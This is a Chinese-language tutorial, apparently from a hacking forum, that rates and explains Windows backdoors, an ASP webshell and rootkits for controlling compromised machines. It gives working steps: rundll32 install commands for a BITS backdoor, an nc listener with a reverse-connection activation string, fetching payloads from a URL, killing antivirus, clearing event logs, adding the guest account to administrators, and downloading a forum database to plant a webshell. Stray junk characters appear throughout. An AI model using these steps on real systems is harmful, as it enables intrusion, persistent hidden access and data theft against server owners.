所谓的“扩展”,是指在功能上有大的提升,比普通的单一功能的后门有很强的使用性,这种后门本身就相当于一个小的安全工具包,能实现非常多的常见安全功能,适合新手使用————但是,功能越强,个人觉得反而脱离了后门“隐蔽”的初衷,具体看法就看各位使用者的喜好了。
c/s后门
和传统的木马程序类似的控制方法,采用“客户端/服务端”的控制方式,通过某种特定的访问方式来启动后门进而控制服务器。
root kit 6o f3H 3B
这个需要单独说明,其实把它单独列一个类在这里是不太恰当的,但是,root kit的出现大大改变了后门程序的思维角度和使用理念,可以说一个好的root kit就是一个完全的系统杀手!后文我们讲涉及到这方面,一定不会让大家失望!
上面是按照技术做的分类,除了这些方面,正向连接后门、反向连接后门等分类也是很常见的,其实如何分类是编程者考虑的事,广大的使用者就不用考虑那么多了,我们看重的,只是功能! 首先我们来简单解释一下什么是典型的线程插入后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说,即使受控制端安装的防火墙拥有“应用程序访问权限”的功能,也不能对这样的后门进行有效的警告和拦截,也就使对方的防火墙形同虚设了!因为对它的查杀比较困难,这种后门本身的功能比较强大,是“居中家旅行、入侵攻击”的必备品哦!
这类的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便。类型:系统后门
使用范围:wind200/xp/2003
隐蔽程序:★★★★☆
使用难度:★★★☆☆
查杀难度:★★★★☆
BITS其实是Background Intelligent Transfer Servicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。
运用举例
首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
这样就激活了BIST,程序用这个特征的字符来辨认使用者,也就相当于你的密码了,然后卸载:rundll32.exe BITS.dll,Uninstall
这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常 大的好处就是非常 隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常 见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!
BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式: 70 +g3l
在本地使用NC监听(如:nc -l -p 1234)
用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)
输入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。 所谓的扩展后门,在普通意义上理解,可以看成是将非常多的功能集成到了后门里,让后门本身就可以实现很多功能,方便直接控制肉鸡或者服务器,这类的后门非常受初学者的喜爱,通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能,本身就是个小的工具包,功能强大。
Wineggdroup shell j;类型:系统后门
使用范围:win2000/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程度:★★★★☆
查杀难度:★★★★☆
这个后门是扩展后门中很有代表性的一个,功能这全面让人叹为观止,它能实现如下比较有特色的功能:进程管理,可查看,杀进程(支持用进程名或PID来杀进程);注册表管现(查看,删除,增加等功能);服务管理(停止,启动,枚举,配置,删除服务等功能)端口到程序关联功能(fport);系统重启,关电源,注销等功能(reboot,poweroff,shutdown,logoff);嗅探密码功能;安装终端,修改终端端口功能;端口重定向功能(多线程,并且可限制连接者IP);HTTP服务功能(多线程,并且可限制连接者IP);Socd5代理功能(支持两种不同方式验证,可限制连接者IP);克隆账号,检测克隆账户功能(clone,checkclone);加强了的FindpassWord功能(可以得到所有登录用户,包括使用克隆账户远程登录用户密码);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他辅助功能,http下载,删除日志,系统信息,恢复常用关联,枚举系统账户等。
当网络上刚推出这个后门的时候,非常多的人用它来替换自己原来使用的后门,一时间各处赞扬之声迭起,但多为一些普通的打捞手的心声,其实它和“后门”的原始定义是有出入的:一旦你需要实现越多的功能,那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题,一个疏忽就会导致全盘皆败,所以不建议将此后门用在需要非常隐蔽的地方。
运用举例
在安装后门前,需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置,从10个具体配置中,包括了插入线程、密码、IP登录邮件通告等方面,不难看出它的功能是非常强大的,隐蔽性也很强,下面说几个在入侵中常用的功能,相信经常玩入侵的朋友一定能发现它的强大之处:
Fport:列出进程到端口的列表,用于发现系统中运行程序所对应的端口,可以用来检测常见的隐蔽的后门。
Reboot:重启系统,如果你上传并运行了其他后门程序,并需要重启机器以便让后门正常工作,那使用这个命令吧! Uz
Shell:得到一个Dos Shell,这个不多讲了,直接得到服务器或者肉鸡上的cmd shell。
Pskill PID或程序名:用于杀掉特定的服务,比如杀毒软件或者是防火墙。
Execute程序:在后台中执行程序,比如sniffer等。http://ip/文件名 保存文件名:下载程序,直接从网上down一个后门到服务器上。
Installterm端口:在没有安装终端服务的win2k服务版的系统中安装终端服务,重启系统后才生效,并可以自定义连接端口,比如不用3389而用其他端口。
StopService/StartService:停止或者启动某个系统服务,比如telnet。
CleanEvent:删除系统日志。
Redirect:TCP数据转发,这个功能是后门程序中非常出色的一个功能,可以通过某一端口的数据转发来控制内网的机器,在渗透入侵的时候非常管用!
EnumService:列举所有自动启动的服务的资料,比如后门、木马。
RegEdit:进入注册表操作模式,熟悉注册表的使用者终于在后门中找到了福音! !
Findpassword:得到所有登录用户密码,比我们常用的findpass功能可强多了。
总体来讲,Wineggdrop shell是后门程序中很出彩的一个,它经过作者几次大规模的修改和升级,已经趋于稳定,功能的强大当然没得说,但是由于功能太强大,被查杀和怀疑是难以避免的,所以很多人在使用Wineggdrop shell一段时间后就发现肉鸡飞了,其实是很正常的事,我你出不用气馁,其实用很简单的方法就可以很好地提高它的隐蔽性,下文将有说明。
相对于Wineggdrop shell来说,独孤剑客的winshell在功能上就不那么全面了,但是笔者推荐新手更多的使用winshell而不是Wineggdrop shell,因为winshell功能除了获得一个shell以外,只加入了一些重启、关闭服务器的命令,功能相对简单,但完全使用系统自带的cmd来执行命令,对系统学习和掌握也是非常有帮助的!
Winshell和wolf这两者都是国内早期顶尖的后门程序,程序的编制无疑是非常经典的,新手学习时使用这两款后门一定能让你明白很多系统相关东西,了解很多入侵思路和方法。 传统的木马程序常常使用C/S构架,这样的构架很方便控制,也在一定程度上避免了“万能密码”的情况出现,对后门私有化有一定的贡献,这方面分类比较模糊,很多后门可以归结到此类中,比如较巧妙的就是ICMP Door了
类型:系统后门
使用范围:win2000/xp/2003 2Z6
隐蔽程度:★★★★★
使用难度:★★★☆☆
危害程度:★★★★☆
查杀难度:★★★★★
这个后门利用ICMP通道进行通信,所以不开任何端口,只是利用系统本身的ICMP包进行控制安装成系统服务后,开机自动运行,可以穿透很多防火墙——很明显可以看出它的最大特点:不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比,它的控制方式是很特殊的,连80端口都不用开放,不得不佩服务程序编制都在这方面独特的思维角度和眼光!
运用举例
这个后门其实用途最广的地方在于突破网关后对内网计算机的控制,因为很多机密数据都是放在内网计算机上的,而控制内网计算机并不是我们想到位的商业网络进行入侵检测,它的网络内部并不像我们常见的内网那样非常容易入侵和控制,因为该公司本身涉及到一些网络安全的服务,所以内网个人计算机的防护是很到位的,在尝试过很多后门后,最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。
首先使用icmpsrv.exe -install参数进行后门的安装,再使用icmpsend.exe IP进行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下载文件,保存在[url=file://\system32]\system32[/url]目录下,文件名为hkfx.exe,程序名前的“-”不能省去,使用[pslist]还可以列出远程主机的进程名称和pid,再使用[pskill id]就可以杀进程了,同样,输入普通cmd命令,则远程主机也就执行了相关的命令。 ~HF1 ? %
这个后门是采用的c/s构架,必须要使用icmpsend才能激活服务器,但是他也有自己的先天不足:后门依靠ICMP进行通讯,经过冲击波的洗礼后,很少有服务器还接受ICMP包了,很多都屏蔽掉了它,所以用它来控制服务器不是一个好办法,这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧? 这是ASP脚本方面流传非常广的一个脚本后门了,在经过几次大的改革后,推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门,想必经常接触脚本安全的朋友对这些都不会陌生。类型:网页木马
使用范围:支持ASP、WEB访问
使用难度:★☆☆☆☆
危害程序:★★★☆☆
查杀难度:★★★☆☆
服务器系统配置都相对安全,公开的系统漏洞存在的机会很少,于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限(比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序),然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码,然后通过WEB访问这个程序,就能很方便地查阅服务器上的资料了,下面举个简单的便子(由于只是简单的介绍,下文便子不会太难或者太普遍,希望大家理解)。
leadbbs2.77曾经风靡网络,它是个很典型的ASP论坛,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜级别的网络管理员总是喜欢默认安装,然后启用论坛,我们只需要很简单地在IE中输入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了,而且没有MD5加密哦!,我们直接找到管理员的账户和密码,然后登录论坛,到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码,然后执行GUEST权限的CMD命令,方便的上传/下载将定程序、远程执行程序等,这样一个隐藏的后门就建好了!取得服务器的SYSTEM权限就看大家自己的办法了。
一般来讲,海洋的功能是非常强大的,而且不容易被查杀(一个朋友采取的方式是:先利用某个脚本漏洞上传网页后门,再通过海洋上传另一个后门到隐蔽的路径,然后通过最后上传的后门来删除第一次上传的海洋,这样后门的存放路径就可以放得非常深了,普通管理员是很难发现的),如果管理员觉得自己可能中了这里边样的后门,可以利用论坛备份来恢复自己的页面系统,再配合系统日志、论坛日志等程序检查系统,发现可疑ASP文件打开看看海洋是很好识别的,再删除就可以了。
脚本方面的后门还有CGI和PHP两面三刀大类,使用原理都差不多,这里就不再多介绍,在黑防论坛也收录了这三种后门,大家可以下载后自己研究。 类型:系统后门
使用范围:win200/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程序:★★★★☆
查杀难度:★★★☆☆
同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。
我们用TELNET连接上去,连接的格式是:TELNET *** 定制的端口,它和其他后门不同之处在于连接后没有提示的界面,每次执行程序也是分开的,必须要每次都有输入密码,比如我们丢掉了服务器和管账户,可以激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服务器了。
很明显示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通过系统自带端口通讯、执行命令比较麻烦,需要每次输入密码而且不回显示输入内容,很容易出错。但是,它有自己的优势:插入线程可以自已定制,比如设置IE的线程为插入的目标就比较难被查杀:自己提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;而且它可以任意改名和绑定,使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,大家有兴趣可以自己研究一下。 如果说上面的后门程序都各有千秋、各有所长的话,它们和经典的root kit 一比简直就是小巫见大巫了,那究竟什么样是root kit呢?
root kit出现于20世纪90年代初,在1994年2月的一篇安全咨询报告中首先使用了root kit这个名词。从出现至今,root kit 的技术发展非常迅速,应用越来越广泛,检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的root kit最多。
很多人有一个误解,他们认为root kit 是用作获得系统root访问权限的工具。实际上,root kit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常,攻击者通过远程攻击获得root访问权限,进入系统后,攻击者会在侵入的主机中安装root kit,然后他将经常通过root kit的后门检查系统是否有其他的用户登录,如果只有自己,攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和密码之后,攻击者就会利用这些信息侵入其他系统。
从*nix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能!网络上常见的root kit 是内核级后门软件,用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。该后门技术允许植入reDirector,是非常难以查杀的一个东东,让很多网络管员非常头疼!